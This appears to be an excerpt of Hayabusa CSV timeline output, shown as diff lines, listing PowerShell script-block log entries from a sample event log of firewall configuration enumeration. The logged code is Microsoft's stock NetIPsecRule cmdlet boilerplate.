${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 